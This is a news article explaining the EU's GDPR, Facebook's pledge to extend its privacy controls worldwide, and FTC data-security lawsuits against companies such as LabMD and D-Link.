The GDPR was proposed by the European Commission in 2012 as an update to an existing EU data-privacy law, Data Protection Directive 95/46/EC, which had been on the books since 1995. The European Parliament passed its own version of the GDPR in 2014 with the Council of the European Union following suit in 2015, at which time the three bodies got together to hash out the final wording of the law. That process lasted until 2016. Now, after a two-year grace period, the GDPR will go into effect in May.
Once it does, it will provide an unprecedented level of privacy protection for EU citizens living both in an EU member nation or abroad. It will effectively regulate the privacy practices of any company that processes the personal data of people residing within the EU, regardless of where the company itself is located -- including the cloud. That is, companies will be held responsible for the handling of the personal data they have collected from users. What's more, it grants people the "right to be forgotten" as well as the right to request both copies of their personal data and information pertaining to how and why their data is being processed.
Users will also enjoy data portability, the ability to move their personal data from one company to another. This rule offers an interesting secondary effect that Facebook might not like. With the ability to move one's data freely between services, it could help prevent the lock-in effect that helps companies like Facebook and Google establish insurmountable market dominance by lowering the barriers of entry for new, competing services.
The GDPR also significantly strengthens consent protections for EU residents/citizens as well. Companies will be prohibited from using "long illegible terms and conditions full of legalese, as the request for consent must be given in an intelligible and easily accessible form, with the purpose for data processing attached to that consent," according to the GDPR website. "It must be as easy to withdraw consent as it is to give it."
When questioned by Rep. Gene Green, a Texas Democrat, about how Facebook would implement this practice in the US, Zuckerberg asserted that the FB app will include a step-by-step tool that walks users through their settings, allowing them to adjust their privacy controls as they wish. Whether users will use the tool in appreciable numbers remains to be seen.
To ensure companies will comply with these broad demands, the GDPR offers some serious penalties for those who would ignore the law. Infractions carry a maximum fine of 4 percent of annual global turnover (aka the company's annual revenue) or €20 million, whichever is greater. The penalties are tiered, mind you, with minor infractions like not having your records in order or not properly notifying authorities in the event of a data breach carrying a 2 percent fine.
To its credit, Facebook has committed to applying the GDPR benchmarks, not just "controls and settings" to all of its global network. "Overall, I think regulations like this are very positive," Zuckerberg told reporters on a conference call in April. "We intend to make all the same controls available everywhere, not just in Europe."
"Is it going to be exactly the same format? Probably not," he continued. "We'll need to figure out what makes sense in different markets with different laws in different places. But let me repeat this: We're going to make all the same controls and settings available everywhere, not just in Europe." That said, there's no word yet on when Facebook would actually implement such changes.
From a technical standpoint, there's not much preventing Facebook from implementing these protections worldwide. The problem, it turns out, is political. As a Facebook representative explained to Techcrunch, the GDPR protections run contrary to data-collection laws in some countries, which means that they can't legally be rolled out everywhere. Still, the company remains committed to expanding the protections to as many users as it can.
While it's all well and good that Facebook is doing the right thing for once rather than moving fast and breaking stuff, there's no reason for governments not to implement their own data-protection legislation. In fact, some local governments are already planning privacy bills. San Francisco supervisor Aaron Peskin announced one such bill on Tuesday which would prohibit the city from doing business with any company that does not adhere to the "the highest standards for data protection." Details of the bill, which will go before voters in November, have not yet been released.
But even without national legislation, the US government already has a de facto data-protection-enforcement mechanism. It's called the Federal Trade Commission. The FTC has aggressively pursued a number of companies including Google and Uber over the past few years using Section 5 of the FTC Act, which prohibits unfair or deceptive trade practices. The FTC has successfully argued that companies that have suffered data breaches violated Section 5 because said breaches were the result of the companies' failure to adopt "reasonable" data-protection schemes.
A few companies have fought against this litigation, rather than settle and issue consent decrees, including Wyndham Hotels and LabMD. These companies argue first that there is no legal definition of what constitutes a "reasonable" data-protection scheme and, second, that no level of cybersecurity is high enough to defend against each and every hacking attempt.
In a 2017 lawsuit against D-Link, the FTC once again invoked Section 5, arguing that the company failed to take reasonable precautions to harden its products against known and reasonable threats. The FTC charges point out that D-Link left its private key, which hackers can use to cajole machines into running malware, on a public website for six months, and the company's software suffers a known "command injection" vulnerability.
However, the case gets a bit sticky because the FTC goes on to argue that D-Link's actions -- just like LabMD's -- may cause harm to its customers. D-Link has countered, arguing that the mere potential for harm is insufficient to bring litigation. According to D-Link's filing, "the FTC speculates that consumers were placed "at risk" to be hacked but fails to allege, as it must, that actual consumers suffered or are likely to suffer actual substantial injuries."
Both the D-Link and LabMD lawsuits are ongoing but illustrate the need for a legislative solution to the issue of data privacy in America, rather than having the courts craft it one case at a time. However, given the partisan climate in Washington, passing a bill similar to the GDPR seems unlikely.